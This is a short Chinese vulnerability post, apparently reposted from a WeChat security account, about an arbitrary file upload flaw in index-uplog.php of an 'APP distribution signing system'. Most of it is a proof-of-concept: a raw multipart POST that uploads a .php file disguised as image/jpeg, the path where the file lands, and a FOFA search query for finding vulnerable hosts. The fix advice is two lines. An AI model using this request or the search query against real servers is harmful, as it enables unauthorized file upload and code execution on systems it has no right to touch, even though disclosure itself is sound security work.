漏洞影响范围
无
漏洞复现
poc
POST
/source/pack/upload/2upload/index-uplog.php
HTTP/2
Host
:
User-Agent
: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Accept-Encoding
: gzip, deflate, br
Accept
: */*
Content-Type
: multipart/form-data; boundary=----123456123
Content-Length
: 197
------
123456123
Content-Disposition: form-
data
; name=
"time"
1
-
22
------
123456123
Content-Disposition: form-
data
; name=
"app"
; filename=
"1.php"
Content-Type: image/jpeg
123456123
------
123456123
--
出现如下数据代表漏洞存在:
url+/source/data/tmp/1-22.php
修复建议
- 限制接口访问
2.联系厂商进行修复
搜索语法
fofa:body="/api/statistics/service-usage-amount"
原文始发于微信公众号(小白菜安全):APP分发签名系统index-uplog.php存在任意文件上传漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论